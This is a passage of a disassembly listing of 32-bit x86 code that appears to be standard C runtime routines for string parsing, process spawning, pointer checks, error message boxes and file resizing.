; Attributes: bp-based frame
sub_434593 proc near ; CODE XREF: sub_4307DF+19�p
; sub_430902+19�p ...
var_28 = word ptr -28h
var_26 = byte ptr -26h
var_24 = byte ptr -24h
var_C = byte ptr -0Ch
arg_0 = byte ptr 8
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 28h
push esi
lea eax, [ebp+arg_0]
push edi
push eax
lea eax, [ebp+var_C]
push eax
call sub_4345EF
pop ecx
lea eax, [ebp+var_28]
pop ecx
lea esi, [ebp+var_C]
push eax
push 0
push 11h
sub esp, 0Ch
mov edi, esp
movsd
movsd
movsw
call sub_435852
mov esi, [ebp+arg_8]
mov edi, [ebp+arg_C]
mov [esi+8], eax
movsx eax, [ebp+var_26]
mov [esi], eax
movsx eax, [ebp+var_28]
mov [esi+4], eax
lea eax, [ebp+var_24]
push eax
push edi
call sub_42A5D0
add esp, 20h
mov [esi+0Ch], edi
mov eax, esi
pop edi
pop esi
leave
retn
sub_434593 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4345EF proc near ; CODE XREF: sub_434593+10�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov edx, [ebp+arg_4]
push ebx
push esi
push edi
mov ax, [edx+6]
mov edi, 7FFh
mov ecx, eax
and eax, 8000h
shr ecx, 4
and ecx, edi
mov [ebp+arg_4], eax
mov eax, [edx+4]
mov edx, [edx]
movzx ebx, cx
mov esi, 80000000h
and eax, 0FFFFFh
test ebx, ebx
mov [ebp+var_4], esi
jz short loc_43463D
cmp ebx, edi
jz short loc_434636
lea edi, [ecx+3C00h]
jmp short loc_43465E
; ---------------------------------------------------------------------------
loc_434636: ; CODE XREF: sub_4345EF+3D�j
mov edi, 7FFFh
jmp short loc_43465E
; ---------------------------------------------------------------------------
loc_43463D: ; CODE XREF: sub_4345EF+39�j
xor ebx, ebx
cmp eax, ebx
jnz short loc_434655
cmp edx, ebx
jnz short loc_434655
mov eax, [ebp+arg_0]
mov [eax+4], ebx
mov [eax], ebx
mov [eax+8], bx
jmp short loc_4346A0
; ---------------------------------------------------------------------------
loc_434655: ; CODE XREF: sub_4345EF+52�j
; sub_4345EF+56�j
lea edi, [ecx+3C01h]
mov [ebp+var_4], ebx
loc_43465E: ; CODE XREF: sub_4345EF+45�j
; sub_4345EF+4C�j
mov ecx, edx
shr ecx, 15h
shl eax, 0Bh
or ecx, eax
mov eax, [ebp+arg_0]
or ecx, [ebp+var_4]
shl edx, 0Bh
mov [eax+4], ecx
mov [eax], edx
loc_434676: ; CODE XREF: sub_4345EF+A6�j
test ecx, esi
jnz short loc_434697
mov edx, [eax]
add ecx, ecx
mov ebx, edx
shr ebx, 1Fh
or ebx, ecx
lea ecx, [edx+edx]
mov [eax], ecx
mov [eax+4], ebx
add edi, 0FFFFh
mov ecx, ebx
jmp short loc_434676
; ---------------------------------------------------------------------------
loc_434697: ; CODE XREF: sub_4345EF+89�j
mov ecx, [ebp+arg_4]
or ecx, edi
mov [eax+8], cx
loc_4346A0: ; CODE XREF: sub_4345EF+64�j
pop edi
pop esi
pop ebx
leave
retn
sub_4345EF endp
; ---------------------------------------------------------------------------
push 2
call sub_42C67C
pop ecx
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4346AE proc near ; CODE XREF: sub_430FC3+AC�p
; sub_431128+10�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push esi
xor esi, esi
cmp dword_676CAC, esi
jnz short loc_4346CB
push [ebp+arg_4]
push [ebp+arg_0]
call sub_42B060
pop ecx
pop ecx
jmp short loc_43471D
; ---------------------------------------------------------------------------
loc_4346CB: ; CODE XREF: sub_4346AE+C�j
push edi
push 19h
call sub_42DAEF
pop ecx
mov ecx, [ebp+arg_0]
loc_4346D7: ; CODE XREF: sub_4346AE+62�j
mov dl, [ecx]
movzx eax, dl
movzx edi, al
test byte_676DC1[edi], 4
jz short loc_434706
mov dl, [ecx+1]
inc ecx
test dl, dl
jz short loc_434702
movzx edi, dl
shl eax, 8
or eax, edi
cmp [ebp+arg_4], eax
jnz short loc_43470D
lea esi, [ecx-1]
jmp short loc_43470D
; ---------------------------------------------------------------------------
loc_434702: ; CODE XREF: sub_4346AE+40�j
test esi, esi
jmp short loc_434709
; ---------------------------------------------------------------------------
loc_434706: ; CODE XREF: sub_4346AE+38�j
cmp [ebp+arg_4], eax
loc_434709: ; CODE XREF: sub_4346AE+56�j
jnz short loc_43470D
mov esi, ecx
loc_43470D: ; CODE XREF: sub_4346AE+4D�j
; sub_4346AE+52�j ...
inc ecx
test dl, dl
jnz short loc_4346D7
push 19h
call sub_42DB50
pop ecx
mov eax, esi
pop edi
loc_43471D: ; CODE XREF: sub_4346AE+1B�j
pop esi
pop ebp
retn
sub_4346AE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_434720 proc near ; CODE XREF: sub_430FC3:loc_43103F�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov ecx, [ebp+arg_0]
loc_434726: ; CODE XREF: sub_434720+C�j
cmp byte ptr [ecx], 3Bh
jnz short loc_43472E
inc ecx
jmp short loc_434726
; ---------------------------------------------------------------------------
loc_43472E: ; CODE XREF: sub_434720+9�j
dec [ebp+arg_8]
push esi
mov eax, ecx
jz short loc_434783
mov dl, [ecx]
mov esi, [ebp+arg_4]
test dl, dl
jz short loc_434777
loc_43473F: ; CODE XREF: sub_434720+55�j
cmp dl, 3Bh
jz short loc_434777
cmp dl, 22h
jz short loc_434754
mov [esi], dl
inc esi
inc ecx
dec [ebp+arg_8]
jz short loc_43477F
jmp short loc_434771
; ---------------------------------------------------------------------------
loc_434754: ; CODE XREF: sub_434720+27�j
inc ecx
loc_434755: ; CODE XREF: sub_434720+49�j
mov dl, [ecx]
test dl, dl
jz short loc_43476B
cmp dl, 22h
jz short loc_43476B
mov [esi], dl
inc esi
inc ecx
dec [ebp+arg_8]
jz short loc_43477F
jmp short loc_434755
; ---------------------------------------------------------------------------
loc_43476B: ; CODE XREF: sub_434720+39�j
; sub_434720+3E�j
cmp byte ptr [ecx], 0
jz short loc_434771
inc ecx
loc_434771: ; CODE XREF: sub_434720+32�j
; sub_434720+4E�j
mov dl, [ecx]
test dl, dl
jnz short loc_43473F
loc_434777: ; CODE XREF: sub_434720+1D�j
; sub_434720+22�j ...
cmp byte ptr [ecx], 3Bh
jnz short loc_434786
inc ecx
jmp short loc_434777
; ---------------------------------------------------------------------------
loc_43477F: ; CODE XREF: sub_434720+30�j
; sub_434720+47�j
mov eax, ecx
jmp short loc_434786
; ---------------------------------------------------------------------------
loc_434783: ; CODE XREF: sub_434720+14�j
mov esi, [ebp+arg_4]
loc_434786: ; CODE XREF: sub_434720+5A�j
; sub_434720+61�j
and byte ptr [esi], 0
sub eax, ecx
neg eax
sbb eax, eax
pop esi
and eax, ecx
pop ebp
retn
sub_434720 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_434794 proc near ; CODE XREF: sub_430FC3+3A�p
; sub_430FC3+114�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
cmp dword_676CAC, 0
push ebx
push esi
jnz short loc_4347B1
push [ebp+arg_4]
push [ebp+arg_0]
call sub_42B1A0
pop ecx
pop ecx
jmp short loc_434827
; ---------------------------------------------------------------------------
loc_4347B1: ; CODE XREF: sub_434794+C�j
push 19h
call sub_42DAEF
mov esi, [ebp+arg_0]
pop ecx
loc_4347BC: ; CODE XREF: sub_434794+60�j
movzx bx, byte ptr [esi]
test bx, bx
jz short loc_43480F
movzx eax, bl
test byte_676DC1[eax], 4
jz short loc_4347EB
mov al, [esi+1]
inc esi
test al, al
jz short loc_4347F6
movzx ecx, bx
movzx eax, al
shl ecx, 8
or ecx, eax
cmp [ebp+arg_4], ecx
jz short loc_434802
jmp short loc_4347F3
; ---------------------------------------------------------------------------
loc_4347EB: ; CODE XREF: sub_434794+3B�j
movzx eax, bx
cmp [ebp+arg_4], eax
jz short loc_43480F
loc_4347F3: ; CODE XREF: sub_434794+55�j
inc esi
jmp short loc_4347BC
; ---------------------------------------------------------------------------
loc_4347F6: ; CODE XREF: sub_434794+43�j
push 19h
call sub_42DB50
pop ecx
xor eax, eax
jmp short loc_434827
; ---------------------------------------------------------------------------
loc_434802: ; CODE XREF: sub_434794+53�j
push 19h
call sub_42DB50
pop ecx
lea eax, [esi-1]
jmp short loc_434827
; ---------------------------------------------------------------------------
loc_43480F: ; CODE XREF: sub_434794+2F�j
; sub_434794+5D�j
push 19h
call sub_42DB50
mov eax, [ebp+arg_4]
pop ecx
movzx ecx, bx
sub eax, ecx
neg eax
sbb eax, eax
not eax
and eax, esi
loc_434827: ; CODE XREF: sub_434794+1B�j
; sub_434794+6C�j ...
pop esi
pop ebx
pop ebp
retn
sub_434794 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43482B proc near ; CODE XREF: sub_431271+32�p
var_60 = dword ptr -60h
var_2E = word ptr -2Eh
var_2C = dword ptr -2Ch
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 60h
mov eax, [ebp+arg_0]
and [ebp+var_1], 0
push ebx
push esi
push edi
xor edi, edi
cmp eax, edi
mov [ebp+var_8], edi
jz short loc_434859
cmp eax, 1
jz short loc_434859
jle short loc_43487B
cmp eax, 3
jle short loc_434859
cmp eax, 4
jnz short loc_43487B
mov [ebp+var_1], 1
loc_434859: ; CODE XREF: sub_43482B+17�j
; sub_43482B+1C�j ...
mov eax, [ebp+arg_8]
mov [ebp+var_C], eax
loc_43485F: ; CODE XREF: sub_43482B+47�j
; sub_43482B+4E�j
mov cl, [eax]
test cl, cl
jz short loc_434892
loc_434865: ; CODE XREF: sub_43482B+3E�j
inc eax
cmp byte ptr [eax], 0
jnz short loc_434865
cmp byte ptr [eax+1], 0
lea ecx, [eax+1]
jz short loc_43485F
mov byte ptr [eax], 20h
mov eax, ecx
jmp short loc_43485F
; ---------------------------------------------------------------------------
loc_43487B: ; CODE XREF: sub_43482B+1E�j
; sub_43482B+28�j
call sub_42F119
mov dword ptr [eax], 16h
call sub_42F122
mov [eax], edi
jmp loc_4349B6
; ---------------------------------------------------------------------------
loc_434892: ; CODE XREF: sub_43482B+38�j
push 44h
lea eax, [ebp+var_60]
pop esi
push esi
push edi
push eax
call sub_429760
mov [ebp+var_60], esi
mov esi, dword_676FE0
add esp, 0Ch
cmp esi, edi
jz short loc_4348D4
lea ecx, [esi-1]
loc_4348B3: ; CODE XREF: sub_43482B+A7�j
mov edx, ecx
mov eax, ecx
sar edx, 5
and eax, 1Fh
mov edx, dword_676EE0[edx*4]
lea eax, [eax+eax*8]
cmp byte ptr [edx+eax*4+4], 0
jnz short loc_4348D4
dec esi
dec ecx
cmp esi, edi
jnz short loc_4348B3
loc_4348D4: ; CODE XREF: sub_43482B+83�j
; sub_43482B+A1�j
lea eax, [esi+esi*4+4]
push 1
mov [ebp+var_2E], ax
movzx eax, ax
push eax
call sub_42B39A
mov [ebp+var_2C], eax
pop ecx
mov [eax], esi
mov eax, [ebp+var_2C]
pop ecx
xor ebx, ebx
cmp esi, edi
lea ecx, [eax+4]
lea edx, [eax+esi+4]
jle short loc_434938
loc_4348FE: ; CODE XREF: sub_43482B+106�j
mov edi, ebx
mov eax, ebx
sar edi, 5
and eax, 1Fh
mov edi, dword_676EE0[edi*4]
lea eax, [eax+eax*8]
lea edi, [edi+eax*4]
mov al, [edi+4]
test al, 10h
jnz short loc_434924
mov [ecx], al
mov eax, [edi]
mov [edx], eax
jmp short loc_43492A
; ---------------------------------------------------------------------------
loc_434924: ; CODE XREF: sub_43482B+EF�j
and byte ptr [ecx], 0
or dword ptr [edx], 0FFFFFFFFh
loc_43492A: ; CODE XREF: sub_43482B+F7�j
inc ebx
inc ecx
add edx, 4
cmp ebx, esi
jl short loc_4348FE
mov eax, [ebp+var_2C]
xor edi, edi
loc_434938: ; CODE XREF: sub_43482B+D1�j
cmp [ebp+var_1], 0
jz short loc_43496B
lea ecx, [eax+4]
xor edx, edx
lea eax, [eax+esi+4]
loc_434947: ; CODE XREF: sub_43482B+137�j
cmp esi, 3
jge short loc_434950
mov ebx, esi
jmp short loc_434953
; ---------------------------------------------------------------------------
loc_434950: ; CODE XREF: sub_43482B+11F�j
push 3
pop ebx
loc_434953: ; CODE XREF: sub_43482B+123�j
cmp edx, ebx
jge short loc_434964
and byte ptr [ecx], 0
or dword ptr [eax], 0FFFFFFFFh
inc edx
inc ecx
add eax, 4
jmp short loc_434947
; ---------------------------------------------------------------------------
loc_434964: ; CODE XREF: sub_43482B+12A�j
mov [ebp+var_8], 8
loc_43496B: ; CODE XREF: sub_43482B+111�j
call sub_42F119
mov [eax], edi
call sub_42F122
mov [eax], edi
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_60]
push eax
push edi
push [ebp+arg_C]
push [ebp+var_8]
push 1
push edi
push edi
push [ebp+var_C]
push [ebp+arg_4]
call dword_4370D8 ; CreateProcessA
mov esi, eax
call dword_437170 ; RtlGetLastWin32Error
push [ebp+var_2C]
mov ebx, eax
call sub_4298F2
cmp esi, edi
pop ecx
jnz short loc_4349BB
push ebx
call sub_42F0A6
pop ecx
loc_4349B6: ; CODE XREF: sub_43482B+62�j
or eax, 0FFFFFFFFh
jmp short loc_434A0F
; ---------------------------------------------------------------------------
loc_4349BB: ; CODE XREF: sub_43482B+182�j
cmp [ebp+arg_0], 2
jnz short loc_4349C7
push edi
call sub_430B45
loc_4349C7: ; CODE XREF: sub_43482B+194�j
cmp [ebp+arg_0], edi
mov esi, dword_437044
jnz short loc_4349F1
push 0FFFFFFFFh
push [ebp+var_1C]
call dword_43707C ; WaitForSingleObject
lea eax, [ebp+arg_8]
push eax
push [ebp+var_1C]
call dword_437100 ; GetExitCodeProcess
push [ebp+var_1C]
call esi ; dword_437044
jmp short loc_434A07
; ---------------------------------------------------------------------------
loc_4349F1: ; CODE XREF: sub_43482B+1A5�j
cmp [ebp+arg_0], 4
jnz short loc_434A01
push [ebp+var_1C]
call esi ; dword_437044
mov [ebp+arg_8], edi
jmp short loc_434A07
; ---------------------------------------------------------------------------
loc_434A01: ; CODE XREF: sub_43482B+1CA�j
mov eax, [ebp+var_1C]
mov [ebp+arg_8], eax
loc_434A07: ; CODE XREF: sub_43482B+1C4�j
; sub_43482B+1D4�j
push [ebp+var_18]
call esi ; dword_437044
mov eax, [ebp+arg_8]
loc_434A0F: ; CODE XREF: sub_43482B+18E�j
pop edi
pop esi
pop ebx
leave
retn
sub_43482B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_434A14 proc near ; CODE XREF: sub_431271+14�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
push 2
pop esi
mov edi, esi
loc_434A22: ; CODE XREF: sub_434A14+22�j
mov eax, [ebx]
test eax, eax
jz short loc_434A38
push eax
add ebx, 4
call sub_4293A0
pop ecx
lea edi, [edi+eax+1]
jmp short loc_434A22
; ---------------------------------------------------------------------------
loc_434A38: ; CODE XREF: sub_434A14+12�j
push edi
call sub_4297B8
pop ecx
mov ecx, [ebp+arg_8]
test eax, eax
mov [ecx], eax
jnz short loc_434A53
mov eax, [ebp+arg_C]
and dword ptr [eax], 0
jmp loc_434B35
; ---------------------------------------------------------------------------
loc_434A53: ; CODE XREF: sub_434A14+32�j
mov edi, [ebp+arg_4]
test edi, edi
jz short loc_434A70
loc_434A5A: ; CODE XREF: sub_434A14+5A�j
mov eax, [edi]
test eax, eax
jz short loc_434A97
push eax
add edi, 4
call sub_4293A0
pop ecx
lea esi, [esi+eax+1]
jmp short loc_434A5A
; ---------------------------------------------------------------------------
loc_434A70: ; CODE XREF: sub_434A14+44�j
mov eax, [ebp+arg_C]
mov ebx, [ebp+arg_C]
mov edi, [ebp+arg_C]
and dword ptr [eax], 0
loc_434A7C: ; CODE XREF: sub_434A14+10D�j
mov eax, [ebp+arg_8]
mov esi, [eax]
mov eax, [ebp+arg_0]
mov [ebp+arg_8], eax
mov eax, [eax]
test eax, eax
jnz loc_434B53
loc_434A91: ; CODE XREF: sub_434A14+185�j
inc esi
jmp loc_434B72
; ---------------------------------------------------------------------------
loc_434A97: ; CODE XREF: sub_434A14+4A�j
mov eax, dword_676924
test eax, eax
jnz short loc_434AB2
call sub_432F35
test eax, eax
mov dword_676924, eax
jz loc_434B4B
loc_434AB2: ; CODE XREF: sub_434A14+8A�j
xor ebx, ebx
cmp [eax], bl
jz short loc_434ADB
mov edi, eax
mov cl, [edi]
loc_434ABC: ; CODE XREF: sub_434A14+C5�j
cmp cl, 3Dh
jz short loc_434ADB
push edi
call sub_4293A0
lea ebx, [ebx+eax+1]
mov eax, dword_676924
pop ecx
mov cl, [eax+ebx]
lea edi, [eax+ebx]
test cl, cl
jnz short loc_434ABC
loc_434ADB: ; CODE XREF: sub_434A14+A2�j
; sub_434A14+AB�j
mov edi, ebx
add eax, ebx
loc_434ADF: ; CODE XREF: sub_434A14+F7�j
cmp byte ptr [eax], 3Dh
jnz short loc_434B0D
cmp byte ptr [eax+1], 0
jz short loc_434B0D
cmp byte ptr [eax+2], 3Ah
jnz short loc_434B0D
cmp byte ptr [eax+3], 3Dh
jnz short loc_434B0D
add eax, 4
push eax
call sub_4293A0
lea edi, [edi+eax+5]
mov eax, dword_676924
pop ecx
add eax, edi
jmp short loc_434ADF
; ---------------------------------------------------------------------------
loc_434B0D: ; CODE XREF: sub_434A14+CE�j
; sub_434A14+D4�j ...
mov eax, edi
sub eax, ebx
add eax, esi
push eax
call sub_4297B8
pop ecx
mov ecx, [ebp+arg_C]
test eax, eax
mov [ecx], eax
jnz loc_434A7C
mov esi, [ebp+arg_8]
push dword ptr [esi]
call sub_4298F2
and dword ptr [esi], 0
pop ecx
loc_434B35: ; CODE XREF: sub_434A14+3A�j
call sub_42F119
mov dword ptr [eax], 0Ch
call sub_42F122
mov dword ptr [eax], 8
loc_434B4B: ; CODE XREF: sub_434A14+98�j
or eax, 0FFFFFFFFh
jmp loc_434C15
; ---------------------------------------------------------------------------
loc_434B53: ; CODE XREF: sub_434A14+77�j
push eax
push esi
call sub_42A5D0
mov eax, [ebp+arg_0]
mov ecx, [eax]
add eax, 4
push ecx
mov [ebp+arg_8], eax
call sub_4293A0
add esp, 0Ch
lea esi, [esi+eax+1]
loc_434B72: ; CODE XREF: sub_434A14+7E�j
mov eax, [ebp+arg_8]
mov eax, [eax]
test eax, eax
jz short loc_434B9E
push eax
push esi
call sub_42A5D0
mov eax, [ebp+arg_8]
add [ebp+arg_8], 4
mov eax, [eax]
push eax
call sub_4293A0
add esp, 0Ch
add esi, eax
mov byte ptr [esi], 20h
jmp loc_434A91
; ---------------------------------------------------------------------------
loc_434B9E: ; CODE XREF: sub_434A14+165�j
mov eax, [ebp+arg_C]
and byte ptr [esi-1], 0
and byte ptr [esi], 0
cmp [ebp+arg_4], 0
mov esi, [eax]
jz short loc_434BEE
mov eax, edi
sub eax, ebx
push eax
mov eax, dword_676924
add eax, ebx
push eax
push esi
call sub_429420
sub edi, ebx
add esp, 0Ch
add esi, edi
mov edi, [ebp+arg_4]
loc_434BCD: ; CODE XREF: sub_434A14+1D8�j
mov eax, [edi]
test eax, eax
jz short loc_434BEE
push eax
push esi
call sub_42A5D0
mov eax, [edi]
add edi, 4
push eax
call sub_4293A0
add esp, 0Ch
lea esi, [esi+eax+1]
jmp short loc_434BCD
; ---------------------------------------------------------------------------
loc_434BEE: ; CODE XREF: sub_434A14+19A�j
; sub_434A14+1BD�j
test esi, esi
jz short loc_434C00
mov eax, [ebp+arg_C]
cmp esi, [eax]
jnz short loc_434BFD
and byte ptr [esi], 0
inc esi
loc_434BFD: ; CODE XREF: sub_434A14+1E3�j
and byte ptr [esi], 0
loc_434C00: ; CODE XREF: sub_434A14+1DC�j
push dword_676924
call sub_4298F2
and dword_676924, 0
pop ecx
xor eax, eax
loc_434C15: ; CODE XREF: sub_434A14+13A�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_434A14 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_434C1A proc near ; CODE XREF: sub_4312E3+5E�p
; sub_435F14+18�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp [ebp+arg_8], 0
jnz short loc_434C27
xor eax, eax
pop ebp
retn
; ---------------------------------------------------------------------------
loc_434C27: ; CODE XREF: sub_434C1A+7�j
push dword_676C9C
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_8]
push [ebp+arg_0]
push 1
push dword_676EC4
call sub_435AE5
add esp, 1Ch
test eax, eax
jnz short loc_434C54
mov eax, 7FFFFFFFh
pop ebp
retn
; ---------------------------------------------------------------------------
loc_434C54: ; CODE XREF: sub_434C1A+31�j
add eax, 0FFFFFFFEh
pop ebp
retn
sub_434C1A endp
; =============== S U B R O U T I N E =======================================
sub_434C59 proc near ; CODE XREF: sub_4312E3+1E�p
; sub_435D8D+5B�p
var_4 = dword ptr -4
push ecx
push ebx
push ebp
push esi
mov esi, dword_6769F4
push edi
xor edi, edi
mov eax, [esi]
cmp eax, edi
jz short loc_434CBA
mov ebx, dword_437074
loc_434C72: ; CODE XREF: sub_434C59+5F�j
push edi
push edi
push edi
push edi
push 0FFFFFFFFh
push eax
push edi
push 1
call ebx ; dword_437074
mov ebp, eax
cmp ebp, edi
jz short loc_434CC2
push ebp
call sub_4297B8
cmp eax, edi
pop ecx
mov [esp+14h+var_4], eax
jz short loc_434CC2
push edi
push edi
push ebp
push eax
push 0FFFFFFFFh
push dword ptr [esi]
push edi
push 1
call ebx ; dword_437074
test eax, eax
jz short loc_434CC2
push edi
push [esp+18h+var_4]
call sub_435D8D
mov eax, [esi+4]
add esi, 4
pop ecx
cmp eax, edi
pop ecx
jnz short loc_434C72
loc_434CBA: ; CODE XREF: sub_434C59+11�j
xor eax, eax
loc_434CBC: ; CODE XREF: sub_434C59+6C�j
pop edi
pop esi
pop ebp
pop ebx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_434CC2: ; CODE XREF: sub_434C59+29�j
; sub_434C59+38�j ...
or eax, 0FFFFFFFFh
jmp short loc_434CBC
sub_434C59 endp
; =============== S U B R O U T I N E =======================================
sub_434CC7 proc near ; CODE XREF: sub_4313FB+77�p
; sub_431929+61�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push 1
pop esi
push [esp+4+arg_4]
push [esp+8+arg_0]
call dword_4371B0 ; IsBadReadPtr
test eax, eax
jz short loc_434CDF
xor esi, esi
loc_434CDF: ; CODE XREF: sub_434CC7+14�j
mov eax, esi
pop esi
retn
sub_434CC7 endp
; =============== S U B R O U T I N E =======================================
sub_434CE3 proc near ; CODE XREF: sub_431929+73�p
; sub_431929+BF�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push 1
pop esi
push [esp+4+arg_4]
push [esp+8+arg_0]
call dword_43715C ; IsBadWritePtr
test eax, eax
jz short loc_434CFB
xor esi, esi
loc_434CFB: ; CODE XREF: sub_434CE3+14�j
mov eax, esi
pop esi
retn
sub_434CE3 endp
; =============== S U B R O U T I N E =======================================
sub_434CFF proc near ; CODE XREF: sub_431929+15B�p
; sub_4320A0+2D�p
arg_0 = dword ptr 4
push esi
push 1
pop esi
push [esp+4+arg_0]
call dword_4371AC ; IsBadCodePtr
test eax, eax
jz short loc_434D13
xor esi, esi
loc_434D13: ; CODE XREF: sub_434CFF+10�j
mov eax, esi
pop esi
retn
sub_434CFF endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431BCC
loc_434D17: ; CODE XREF: sub_431BCC:loc_431C28�j
push 0Ah
call sub_4330A0
push 16h
call sub_435021
pop ecx
pop ecx
push 3
call sub_430B45
; END OF FUNCTION CHUNK FOR sub_431BCC
; =============== S U B R O U T I N E =======================================
sub_434D2E proc near ; CODE XREF: sub_432BD7+2B�p
arg_0 = dword ptr 4
push 4
push 0
push [esp+8+arg_0]
call sub_434D3F
add esp, 0Ch
retn
sub_434D2E endp
; =============== S U B R O U T I N E =======================================
sub_434D3F proc near ; CODE XREF: sub_434D2E+8�p
arg_0 = byte ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
movzx eax, [esp+arg_0]
mov cl, [esp+arg_8]
test byte_676DC1[eax], cl
jnz short loc_434D6C
cmp [esp+arg_4], 0
jz short loc_434D65
movzx eax, word_4533C2[eax*2]
and eax, [esp+arg_4]
jmp short loc_434D67
; ---------------------------------------------------------------------------
loc_434D65: ; CODE XREF: sub_434D3F+16�j
xor eax, eax
loc_434D67: ; CODE XREF: sub_434D3F+24�j
test eax, eax
jnz short loc_434D6C
retn
; ---------------------------------------------------------------------------
loc_434D6C: ; CODE XREF: sub_434D3F+F�j
; sub_434D3F+2A�j
push 1
pop eax
retn
sub_434D3F endp
; =============== S U B R O U T I N E =======================================
sub_434D70 proc near ; CODE XREF: sub_4330A0+11F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
xor ebx, ebx
cmp dword_676C58, ebx
push esi
push edi
jnz short loc_434DBF
push offset aUser32_dll ; "user32.dll"
call dword_437034 ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_434DF5
mov esi, dword_437030
push offset aMessageboxa ; "MessageBoxA"
push edi
call esi ; dword_437030
test eax, eax
mov dword_676C58, eax
jz short loc_434DF5
push offset aGetactivewindo ; "GetActiveWindow"
push edi
call esi ; dword_437030
push offset aGetlastactivep ; "GetLastActivePopup"
push edi
mov dword_676C5C, eax
call esi ; dword_437030
mov dword_676C60, eax
loc_434DBF: ; CODE XREF: sub_434D70+B�j
mov eax, dword_676C5C
test eax, eax
jz short loc_434DDE
call eax ; dword_676C5C
mov ebx, eax
test ebx, ebx
jz short loc_434DDE
mov eax, dword_676C60
test eax, eax
jz short loc_434DDE
push ebx
call eax ; dword_676C60
mov ebx, eax
loc_434DDE: ; CODE XREF: sub_434D70+56�j
; sub_434D70+5E�j ...
push [esp+0Ch+arg_8]
push [esp+10h+arg_4]
push [esp+14h+arg_0]
push ebx
call dword_676C58 ; MessageBoxA
loc_434DF1: ; CODE XREF: sub_434D70+87�j
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_434DF5: ; CODE XREF: sub_434D70+1C�j
; sub_434D70+33�j
xor eax, eax
jmp short loc_434DF1
sub_434D70 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_434DF9 proc near ; CODE XREF: sub_4336B9+28A�p
var_1004 = byte ptr -1004h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 1004h
call sub_429B60
push ebx
push esi
xor esi, esi
push 1
push esi
push [ebp+arg_0]
call sub_42F91D
or ebx, 0FFFFFFFFh
add esp, 0Ch
cmp eax, ebx
mov [ebp+var_4], eax
jz loc_434F18
push 2
push esi
push [ebp+arg_0]
call sub_42F91D
add esp, 0Ch
cmp eax, ebx
jz loc_434F18
push edi
mov edi, [ebp+arg_4]
sub edi, eax
test edi, edi
jle short loc_434EBB
mov ebx, 1000h
lea eax, [ebp+var_1004]
push ebx
push esi
push eax
call sub_429760
push 8000h
push [ebp+arg_0]
call sub_435FD3
add esp, 14h
mov [ebp+arg_4], eax
loc_434E6C: ; CODE XREF: sub_434DF9+99�j
cmp edi, ebx
mov eax, ebx
jge short loc_434E74
mov eax, edi
loc_434E74: ; CODE XREF: sub_434DF9+77�j
push eax
lea eax, [ebp+var_1004]
push eax
push [ebp+arg_0]
call sub_432501
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz short loc_434E94
sub edi, eax
test edi, edi
jle short loc_434EAC
jmp short loc_434E6C
; ---------------------------------------------------------------------------
loc_434E94: ; CODE XREF: sub_434DF9+91�j
call sub_42F122
cmp dword ptr [eax], 5
jnz short loc_434EA9
call sub_42F119
mov dword ptr [eax], 0Dh
loc_434EA9: ; CODE XREF: sub_434DF9+A3�j
or esi, 0FFFFFFFFh
loc_434EAC: ; CODE XREF: sub_434DF9+97�j
push [ebp+arg_4]
push [ebp+arg_0]
call sub_435FD3
pop ecx
pop ecx
jmp short loc_434F03
; ---------------------------------------------------------------------------
loc_434EBB: ; CODE XREF: sub_434DF9+4B�j
jge short loc_434F03
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call sub_42F91D
push [ebp+arg_0]
call sub_4323D9
add esp, 10h
push eax
call dword_4371A8 ; SetEndOfFile
mov esi, eax
neg esi
sbb esi, esi
neg esi
dec esi
cmp esi, ebx
jnz short loc_434F03
call sub_42F119
mov dword ptr [eax], 0Dh
call dword_437170 ; RtlGetLastWin32Error
mov edi, eax
call sub_42F122
mov [eax], edi
loc_434F03: ; CODE XREF: sub_434DF9+C0�j
; sub_434DF9:loc_434EBB�j ...
push 0
push [ebp+var_4]
push [ebp+arg_0]
call sub_42F91D
add esp, 0Ch
mov eax, esi
pop edi
jmp short loc_434F1A
; ---------------------------------------------------------------------------
